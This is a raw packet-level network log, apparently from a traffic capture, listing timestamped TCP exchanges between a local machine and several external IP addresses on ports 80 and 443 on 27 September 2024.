                                                                                    Sep 27, 2024 00:15:06.746931076 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746939898 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.746959925 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.746999025 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747026920 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747044086 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747073889 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747109890 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747121096 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747134924 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747148991 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747162104 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747165918 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747190952 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747216940 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747277975 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747293949 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747308969 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747327089 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747356892 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747356892 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747370958 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747395039 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747409105 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747409105 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747436047 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747466087 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747492075 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747507095 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747520924 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747534990 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747539043 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747551918 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747564077 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747580051 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747621059 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747761011 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747776985 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747792006 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747813940 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747831106 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747843027 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747848034 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747859001 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747873068 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747889042 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.747894049 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747912884 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.747947931 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748234034 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748249054 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748262882 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748276949 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748287916 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748300076 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748308897 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748312950 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748327971 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748342037 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748342037 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748357058 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748367071 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748374939 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748389959 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748402119 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748405933 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748421907 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748435974 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748442888 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748450994 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748467922 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748486042 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748497963 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748513937 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748517990 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748531103 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748544931 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748548031 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748559952 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748568058 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748574972 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748594999 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748629093 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748928070 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748943090 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748956919 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748971939 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.748979092 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.748992920 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.749001980 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.749007940 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.749022961 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.749036074 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.749043941 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.749053001 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.749067068 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.749070883 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.749082088 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.749095917 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.749102116 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.749124050 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.749142885 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.886898994 CEST49765443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:06.886960983 CEST443497655.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.887028933 CEST49765443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:06.887334108 CEST49765443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:06.887356043 CEST443497655.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:07.190037012 CEST49766443192.168.2.4104.21.36.139
                                                                                    Sep 27, 2024 00:15:07.190090895 CEST44349766104.21.36.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:07.190171957 CEST49766443192.168.2.4104.21.36.139
                                                                                    Sep 27, 2024 00:15:07.191673994 CEST49766443192.168.2.4104.21.36.139
                                                                                    Sep 27, 2024 00:15:07.191694021 CEST44349766104.21.36.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:07.668929100 CEST44349766104.21.36.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:07.669122934 CEST49766443192.168.2.4104.21.36.139
                                                                                    Sep 27, 2024 00:15:07.670861959 CEST49766443192.168.2.4104.21.36.139
                                                                                    Sep 27, 2024 00:15:07.670872927 CEST44349766104.21.36.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:07.671272039 CEST44349766104.21.36.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:07.711447954 CEST49766443192.168.2.4104.21.36.139
                                                                                    Sep 27, 2024 00:15:07.715045929 CEST49766443192.168.2.4104.21.36.139
                                                                                    Sep 27, 2024 00:15:07.715184927 CEST49766443192.168.2.4104.21.36.139
                                                                                    Sep 27, 2024 00:15:07.715267897 CEST44349766104.21.36.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:07.750700951 CEST443497655.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:07.750778913 CEST49765443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:07.751282930 CEST49765443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:07.751291990 CEST443497655.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:07.752876043 CEST49765443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:07.752882004 CEST443497655.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.133117914 CEST44349766104.21.36.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.133244038 CEST44349766104.21.36.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.133341074 CEST49766443192.168.2.4104.21.36.139
                                                                                    Sep 27, 2024 00:15:08.134969950 CEST49766443192.168.2.4104.21.36.139
                                                                                    Sep 27, 2024 00:15:08.134969950 CEST49766443192.168.2.4104.21.36.139
                                                                                    Sep 27, 2024 00:15:08.134996891 CEST44349766104.21.36.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.135010958 CEST44349766104.21.36.139192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.178118944 CEST49767443192.168.2.4104.21.4.136
                                                                                    Sep 27, 2024 00:15:08.178174973 CEST44349767104.21.4.136192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.178267956 CEST49767443192.168.2.4104.21.4.136
                                                                                    Sep 27, 2024 00:15:08.178670883 CEST49767443192.168.2.4104.21.4.136
                                                                                    Sep 27, 2024 00:15:08.178688049 CEST44349767104.21.4.136192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.654504061 CEST44349767104.21.4.136192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.654623032 CEST49767443192.168.2.4104.21.4.136
                                                                                    Sep 27, 2024 00:15:08.656332970 CEST49767443192.168.2.4104.21.4.136
                                                                                    Sep 27, 2024 00:15:08.656351089 CEST44349767104.21.4.136192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.656616926 CEST44349767104.21.4.136192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.657882929 CEST49767443192.168.2.4104.21.4.136
                                                                                    Sep 27, 2024 00:15:08.657917023 CEST49767443192.168.2.4104.21.4.136
                                                                                    Sep 27, 2024 00:15:08.657960892 CEST44349767104.21.4.136192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.710968018 CEST443497655.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.711049080 CEST443497655.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.711066008 CEST49765443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:08.711105108 CEST49765443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:08.711322069 CEST49765443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:08.711337090 CEST443497655.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.712829113 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.717771053 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898118019 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898183107 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898192883 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898205996 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898248911 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898271084 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898277044 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898289919 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898303032 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898330927 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898349047 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898422956 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898468018 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898502111 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898514986 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898547888 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898571014 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898597002 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898607969 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898618937 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898629904 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898646116 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898669958 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898675919 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898683071 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898694038 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898711920 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898745060 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898886919 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898897886 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898909092 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898920059 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898931026 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898931980 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898948908 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898961067 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898964882 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.898972988 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898983955 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898994923 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.898996115 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899017096 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899043083 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899142027 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899153948 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899166107 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899177074 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899187088 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899188995 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899199963 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899209023 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899213076 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899245977 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899271011 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899272919 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899315119 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899348974 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899360895 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899372101 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899395943 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899406910 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899411917 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899411917 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899420023 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899445057 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899468899 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899476051 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899509907 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899533033 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899544954 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899576902 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899590969 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899607897 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899619102 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899630070 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899641037 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899652004 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899679899 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899703979 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899734020 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899744987 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899755955 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899766922 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899777889 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899780035 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899804115 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899832010 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.899966002 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899976015 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899987936 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.899998903 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900026083 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900036097 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900048018 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900057077 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900059938 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900078058 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900110006 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900204897 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900216103 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900227070 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900238991 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900248051 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900253057 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900265932 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900275946 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900280952 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900288105 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900299072 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900314093 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900337934 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900378942 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900433064 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900477886 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900629044 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900640965 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900650978 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900661945 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900671959 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.900675058 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900702000 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.900733948 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902245045 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902295113 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902297974 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902312040 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902340889 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902357101 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902359009 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902371883 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902381897 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902394056 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902400970 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902430058 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902463913 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902571917 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902584076 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902594090 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902606010 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902616024 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902616978 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902628899 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902636051 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902641058 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902652025 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902663946 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902673006 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902692080 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902707100 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902848959 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902862072 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902873993 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902884007 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902894974 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902894974 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902908087 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902915955 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902920008 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902932882 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902944088 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.902946949 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902966022 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.902993917 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:08.903151989 CEST8049764147.45.44.104192.168.2.4
